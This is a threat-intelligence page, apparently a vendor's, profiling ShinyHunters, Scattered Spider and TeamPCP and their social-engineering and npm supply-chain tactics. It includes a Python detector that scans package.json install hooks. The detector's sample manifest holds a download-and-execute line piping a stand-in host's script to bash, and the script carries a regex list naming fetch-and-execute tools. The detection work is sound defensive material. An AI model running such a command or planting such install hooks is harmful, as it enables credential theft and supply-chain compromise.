Threat Actors

Profiles for actors tracked across more than two threat briefs. Each card blends open-source intelligence with what Vega has observed in its own reporting.

3 actors reported in Vega briefs

ShinyHunters

4 briefs

Motivation

Financially motivated — data theft & extortion

First seen

2020

Also known as

Bling Libra, UNC6240, UNC6661, UNC6671, Sp1d3rhunters

Actor IOCs (31)

ShinyHunters is a financially motivated data-theft and extortion collective that rose to prominence in 2020 by breaching dozens of companies and selling stolen databases on underground forums such as RaidForums and, later, BreachForums. Rather than encrypting victims, the group specializes in mass data exfiltration followed by public extortion via its own data-leak site. Google's Threat Intelligence Group tracks the financially motivated cluster behind the current wave as UNC6240, with related vishing and SaaS-theft activity attributed to clusters UNC6661 and UNC6671. Recent operations have pivoted from bulk database dumps toward targeted social engineering — help-desk vishing, victim-branded SSO/Okta phishing pages, and OAuth/connected-app abuse — to plunder SaaS platforms like Salesforce, SharePoint, DocuSign and Google Workspace before extortion.

Sources: Wikipedia · Malpedia

Targeted sectors

Banking, Commercial Facilities, Education, Financial Services, Information Technology, Insurance, Technology, Healthcare, Hospitality, Media & Entertainment, Retail, Telecommunications

Targeted regions

Australia, Canada, Netherlands, United Kingdom, United States, France

Scattered Spider

3 briefs

Motivation

Financially motivated — social engineering & ransomware

First seen

2022

Also known as

UNC3944, Octo Tempest, Muddled Libra, 0ktapus, Oktapus, Scatter Swine, Storm-0875, Star Fraud

Actor IOCs (13)

Scattered Spider is a financially motivated, loosely organized collective of mostly native-English-speaking actors associated with the broader online community known as "The Com." Active since at least 2022, the group is best known for advanced social engineering — IT help-desk vishing, MFA-fatigue push bombing, and SIM-swapping — to defeat multi-factor authentication and seize initial access at large enterprises. After entry they register attacker-controlled MFA devices, abuse RMM tooling, federate rogue identity providers, and move laterally through cloud and on-prem estates before exfiltrating data and deploying ransomware (historically ALPHV/BlackCat, more recently DragonForce). Mandiant tracks the group as UNC3944, Microsoft as Octo Tempest, and Palo Alto Unit 42 as Muddled Libra.

Sources: Wikipedia · Malpedia

Targeted sectors

Banking, Financial Services, Insurance, Technology, Business Process Outsourcing, Gaming & Casinos, Hospitality, Manufacturing, Retail, Telecommunications

Targeted regions

Australia, Canada, Netherlands, United Kingdom, United States, Singapore

TeamPCP

3 briefs

Motivation

Credential theft & destructive supply-chain compromise

First seen

2026

Also known as

Mini Shai-Hulud, CanisterWorm (linked)

Actor IOCs (48)

TeamPCP is the threat actor behind a series of open-source software supply-chain compromises first widely documented in early 2026, including attacks on Aqua Security's Trivy, Checkmarx, the Bitwarden CLI, Telnyx, the SAP CAP npm ecosystem, and the TanStack/UiPath npm packages. Dubbed "Mini Shai-Hulud" for echoing the earlier Shai-Hulud npm worm, the group backdoors packages with npm preinstall hooks that fetch the Bun runtime and execute obfuscated stealers, harvesting developer and CI/CD credentials — including, in later waves, OIDC tokens read directly from GitHub Actions runner memory and password-vault data. Payloads self-propagate by republishing the victim's own packages and, in the TanStack wave, install a destructive daemon that wipes the user's home directory when the stolen GitHub token is revoked. As a recently identified cluster, TeamPCP does not yet have established Wikipedia or Malpedia profiles; the supporting research lives in the related briefs below.
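The install-time hook pattern described above (a preinstall script that fetches a runtime such as Bun and executes a downloaded loader) is something a defender can triage mechanically before the hook ever runs. The following is an added example, not Vega's code or detection content: it parses an npm package.json, inspects the lifecycle scripts npm runs automatically (preinstall, install, postinstall, prepare), and flags commands that download and execute content. The indicator patterns, the sample manifests and the `example.invalid` URL are all constructed for this example.

```python
"""Triage npm lifecycle scripts for download-and-execute behaviour.

Added example (not Vega's own tooling). Scans package.json files for
lifecycle hooks that npm runs automatically during install and flags
commands that fetch remote content and hand it to an interpreter or
runtime. The indicator list and sample manifests are constructed.
"""
import json
import re
from pathlib import Path

# Hooks npm executes without the user explicitly invoking them.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Constructed indicator patterns: (label, compiled regex).
SUSPICIOUS = [
    ("remote_fetch", re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b")),
    ("bun_runtime", re.compile(r"\bbun(?:\.exe)?\b")),
    ("shell_pipe_exec", re.compile(r"\|\s*(sh|bash|node|bun)\b")),
    ("inline_eval", re.compile(r"\bnode\s+-e\b|\beval\s*\(")),
    ("base64_decode", re.compile(r"base64\s*(-d|--decode)|\batob\(")),
]


def audit_manifest(manifest_text: str) -> list:
    """Return one finding per lifecycle hook whose command matches an indicator."""
    pkg = json.loads(manifest_text)
    scripts = pkg.get("scripts") or {}
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        hits = [label for label, rx in SUSPICIOUS if rx.search(cmd)]
        if hits:
            findings.append({
                "package": pkg.get("name", "<unnamed>"),
                "hook": hook,
                "command": cmd,
                "indicators": hits,
            })
    return findings


def severity(finding: dict) -> str:
    """A fetch combined with an execution primitive is the high-confidence case."""
    ind = set(finding["indicators"])
    if "remote_fetch" in ind and ind & {"shell_pipe_exec", "bun_runtime", "inline_eval"}:
        return "high"
    return "medium" if ind else "none"


def audit_directory(root: str) -> list:
    """Walk an installed tree (e.g. node_modules) and audit every package.json."""
    findings = []
    for manifest in Path(root).rglob("package.json"):
        try:
            findings.extend(audit_manifest(manifest.read_text(encoding="utf-8")))
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: skip, don't abort
    return findings


# Constructed sample manifests for demonstration.
BENIGN_MANIFEST = json.dumps({
    "name": "good-lib", "version": "1.0.0",
    "scripts": {"postinstall": "node scripts/build-native.js", "test": "jest"},
})
MALICIOUS_MANIFEST = json.dumps({
    "name": "evil-lib", "version": "2.3.1",
    "scripts": {"preinstall": "curl -fsSL https://example.invalid/setup.sh | bash && bun run setup.js"},
})

if __name__ == "__main__":
    for text in (BENIGN_MANIFEST, MALICIOUS_MANIFEST):
        for f in audit_manifest(text):
            print(f"[{severity(f)}] {f['package']} {f['hook']}: {f['indicators']}")
```

Run `audit_directory("node_modules")` after a fresh install with scripts disabled (`npm install --ignore-scripts`, or `npm config set ignore-scripts true` for CI runners) to review hooks before allowing them to execute. The check is string-based triage only: a loader that lives in a separate file referenced by a plain `node setup.js` hook is not caught by these patterns, so treat a clean result as "nothing obvious", not as a clearance.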

Targeted sectors

Financial Services, Technology, DevOps & Cloud, Software Development

Targeted regions

Iran, Israel, Global
